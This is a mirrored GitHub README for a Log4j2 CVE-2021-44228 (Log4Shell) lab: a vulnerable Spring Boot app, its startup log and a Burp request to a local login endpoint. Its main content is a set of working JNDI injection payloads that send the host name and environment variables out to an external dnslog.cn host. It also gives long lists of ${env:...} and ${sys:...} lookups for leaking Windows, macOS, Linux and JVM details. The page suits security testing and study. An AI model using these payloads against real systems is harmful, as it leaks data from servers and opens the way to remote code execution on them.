Git Product home page Git Product logo

log4j2-cve-2021-44228's Introduction

CVE-2021-44228 Remote Code Injection In Log4j

https://twitter.com/jas502n/status/1468946197629272066

image

        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.1</version>
        </dependency>

漏洞环境使用

usage: image

$ java -jar log4jRCE-0.0.1-SNAPSHOT.jar    

[*] CVE-2021-44228 Log4j2 Remote Code Injection

  .   ____          _            __ _ _
 /\\ / ___'_ __ _ _(_)_ __  __ _ \ \ \ \
( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
 \\/  ___)| |_)| | | | | || (_| |  ) ) ) )
  '  |____| .__|_| |_|_| |_\__, | / / / /
 =========|_|==============|___/=/_/_/_/
 :: Spring Boot ::                (v2.6.1)

2021-12-10 16:18:43.099  WARN 48536 --- [           main] o.s.boot.StartupInfoLogger               : InetAddress.getLocalHost().getHostName() took 5005 milliseconds to respond. Please verify your network configuration (macOS machines may need to add entries to /etc/hosts).
2021-12-10 16:18:48.108  INFO 48536 --- [           main] c.example.log4jrce.Log4jRceApplication   : Starting Log4jRceApplication v0.0.1-SNAPSHOT using Java 1.8.0_60 on JMacBookPro.local with PID 48536 (/Users/jas502n/IdeaProjects/log4jRCE/target/log4jRCE-0.0.1-SNAPSHOT.jar started by root in log4jRCE/target)
2021-12-10 16:18:48.109  INFO 48536 --- [           main] c.example.log4jrce.Log4jRceApplication   : No active profile set, falling back to default profiles: default
2021-12-10 16:18:48.890  INFO 48536 --- [           main] o.s.b.w.embedded.tomcat.TomcatWebServer  : Tomcat initialized with port(s): 8080 (http)
2021-12-10 16:18:48.902  INFO 48536 --- [           main] o.apache.catalina.core.StandardService   : Starting service [Tomcat]
2021-12-10 16:18:48.902  INFO 48536 --- [           main] org.apache.catalina.core.StandardEngine  : Starting Servlet engine: [Apache Tomcat/9.0.55]
2021-12-10 16:18:48.957  INFO 48536 --- [           main] o.a.c.c.C.[Tomcat].[localhost].[/]       : Initializing Spring embedded WebApplicationContext

Burpsuite Send

image

POST /login HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

data=xxxxx

HTTP/1.1 200 
Content-Type: text/html;charset=UTF-8
Content-Length: 15
Date: Fri, 10 Dec 2021 08:38:50 GMT
Connection: close

log4j2 success!

Fix log4j2 Tips By Default Properites

默认 Map 预先填充了 hostName 的值,该值是当前系统的主机名或IP地址,

参考文档:https://www.docs4dev.com/docs/zh/log4j2/2.x/all/manual-configuration.html

org.apache.logging.log4j.core.LoggerContext#setConfiguration

image image

${hostName}
${env:COMPUTERNAME}
${env:USERDOMAIN}
${env:LOGONSERVER}

Example:

// log4j2 Default,For(Windows、Linux、macOS....)
${jndi:dns://${hostName}.iwk5r1.dnslog.cn}

// Equivalent to windows command(set|findstr your-hostname)
${jndi:dns://${env:COMPUTERNAME}.iwk5r1.dnslog.cn}
${jndi:dns://${env:USERDOMAIN}.iwk5r1.dnslog.cn}

image

log4j2-env
Mac:
ANT_HOME,COMMAND_MODE,GOBIN,GOPATH,GOROOT,GRADLE_HOME,HOME,HOMEBREW_BOTTLE_DOMAIN,JAVA_HOME,JAVA_MAIN_CLASS_3651,LC_CTYPE,LESS,LOGNAME,LSCOLORS,LaunchInstanceID,OLDPWD,PAGER,PATH,PWD,SECURITYSESSIONID,SHELL,SSH_AUTH_SOCK,TIME_STYLE,TMPDIR,USER,VERSIONER_PYTHON_VERSION,XPC_FLAGS,XPC_SERVICE_NAME,ZSH,__CF_USER_TEXT_ENCODING
${env:ANT_HOME}
${env:COMMAND_MODE}
${env:GOBIN}
${env:GOPATH}
${env:GOROOT}
${env:GRADLE_HOME}
${env:HOME}
${env:HOMEBREW_BOTTLE_DOMAIN}
${env:JAVA_HOME}
${env:JAVA_MAIN_CLASS_3651}
${env:LC_CTYPE}
${env:LESS}
${env:LOGNAME}
${env:LSCOLORS}
${env:LaunchInstanceID}
${env:OLDPWD}
${env:PAGER}
${env:PATH}
${env:PWD}
${env:SECURITYSESSIONID}
${env:SHELL}
${env:SSH_AUTH_SOCK}
${env:TIME_STYLE}
${env:TMPDIR}
${env:USER}
${env:VERSIONER_PYTHON_VERSION}
${env:XPC_FLAGS}
${env:XPC_SERVICE_NAME}
${env:ZSH}
Windows:
=E:,=ExitCode,A8_HOME,A8_ROOT_BIN,ALLUSERSPROFILE,APPDATA,CATALINA_BASE,CATALINA_HOME,CATALINA_OPTS,CATALINA_TMPDIR,CLASSPATH,CLIENTNAME,COMPUTERNAME,ComSpec,CommonProgramFiles,CommonProgramFiles(x86),CommonProgramW6432,FP_NO_HOST_CHECK,HOMEDRIVE,HOMEPATH,JRE_HOME,Java_Home,LOCALAPPDATA,LOGONSERVER,NUMBER_OF_PROCESSORS,OS,PATHEXT,PROCESSOR_ARCHITECTURE,PROCESSOR_IDENTIFIER,PROCESSOR_LEVEL,PROCESSOR_REVISION,PROMPT,PSModulePath,PUBLIC,Path,ProgramData,ProgramFiles,ProgramFiles(x86),ProgramW6432,SESSIONNAME,SystemDrive,SystemRoot,TEMP,TMP,ThisExitCode,USERDOMAIN,USERNAME,USERPROFILE,WORK_PATH,windir,windows_tracing_flags,windows_tracing_logfile
${env:A8_HOME}
${env:A8_ROOT_BIN}
${env:ALLUSERSPROFILE}
${env:APPDATA}
${env:CATALINA_BASE}
${env:CATALINA_HOME}
${env:CATALINA_OPTS}
${env:CATALINA_TMPDIR}
${env:CLASSPATH}
${env:CLIENTNAME}
${env:COMPUTERNAME}
${env:ComSpec}
${env:CommonProgramFiles}
${env:CommonProgramFiles(x86)}
${env:CommonProgramW6432}
${env:FP_NO_HOST_CHECK}
${env:HOMEDRIVE}
${env:HOMEPATH}
${env:JRE_HOME}
${env:Java_Home}
${env:LOCALAPPDATA}
${env:LOGONSERVER}
${env:NUMBER_OF_PROCESSORS}
${env:OS}
${env:PATHEXT}
${env:PROCESSOR_ARCHITECTURE}
${env:PROCESSOR_IDENTIFIER}
${env:PROCESSOR_LEVEL}
${env:PROCESSOR_REVISION}
${env:PROMPT}
${env:PSModulePath}
${env:PUBLIC}
${env:Path}
${env:ProgramData}
${env:ProgramFiles}
${env:ProgramFiles(x86)}
${env:ProgramW6432}
${env:SESSIONNAME}
${env:SystemDrive}
${env:SystemRoot}
${env:TEMP}
${env:TMP}
${env:ThisExitCode}
${env:USERDOMAIN}
${env:USERNAME}
${env:USERPROFILE}
${env:WORK_PATH}
${env:windir}
${env:windows_tracing_flags}
${env:windows_tracing_logfile}
Linux:
CLASSPATH,HOME,JAVA_HOME,LANG,LC_TERMINAL,LC_TERMINAL_VERSION,LESS,LOGNAME,LSCOLORS,LS_COLORS,MAIL,NLSPATH,OLDPWD,PAGER,PATH,PWD,SHELL,SHLVL,SSH_CLIENT,SSH_CONNECTION,SSH_TTY,TERM,USER,XDG_RUNTIME_DIR,XDG_SESSION_ID,XFILESEARCHPATH,ZSH,_
${env:CLASSPATH}
${env:HOME}
${env:JAVA_HOME}
${env:LANG}
${env:LC_TERMINAL}
${env:LC_TERMINAL_VERSION}
${env:LESS}
${env:LOGNAME}
${env:LSCOLORS}
${env:LS_COLORS}
${env:MAIL}
${env:NLSPATH}
${env:OLDPWD}
${env:PAGER}
${env:PATH}
${env:PWD}
${env:SHELL}
${env:SHLVL}
${env:SSH_CLIENT}
${env:SSH_CONNECTION}
${env:SSH_TTY}
${env:TERM}
${env:USER}
${env:XDG_RUNTIME_DIR}
${env:XDG_SESSION_ID}
${env:XFILESEARCHPATH}
${env:ZSH}
log4j2-sys
${sys:awt.toolkit}
${sys:file.encoding}
${sys:file.encoding.pkg}
${sys:file.separator}
${sys:java.awt.graphicsenv}
${sys:java.awt.printerjob}
${sys:java.class.path}
${sys:java.class.version}
${sys:java.endorsed.dirs}
${sys:java.ext.dirs}
${sys:java.home}
${sys:java.io.tmpdir}
${sys:java.library.path}
${sys:java.runtime.name}
${sys:java.runtime.version}
${sys:java.specification.name}
${sys:java.specification.vendor}
${sys:java.specification.version}
${sys:java.vendor}
${sys:java.vendor.url}
${sys:java.vendor.url.bug}
${sys:java.version}
${sys:java.vm.info}
${sys:java.vm.name}
${sys:java.vm.specification.name}
${sys:java.vm.specification.vendor}
${sys:java.vm.specification.version}
${sys:java.vm.vendor}
${sys:java.vm.version}
${sys:line.separator}
${sys:os.arch}
${sys:os.name}
${sys:os.version}
${sys:path.separator}
${sys:sun.arch.data.model}
${sys:sun.boot.class.path}
${sys:sun.boot.library.path}
${sys:sun.cpu.endian}
${sys:sun.cpu.isalist}
${sys:sun.desktop}
${sys:sun.io.unicode.encoding}
${sys:sun.java.command}
${sys:sun.java.launcher}
${sys:sun.jnu.encoding}
${sys:sun.management.compiler}
${sys:sun.os.patch.level}
${sys:sun.stderr.encoding}
${sys:user.country}
${sys:user.dir}
${sys:user.home}
${sys:user.language}
${sys:user.name}
${sys:user.script}
${sys:user.timezone}
${sys:user.variant}

log4j2-cve-2021-44228's People

Contributors

jas502n avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.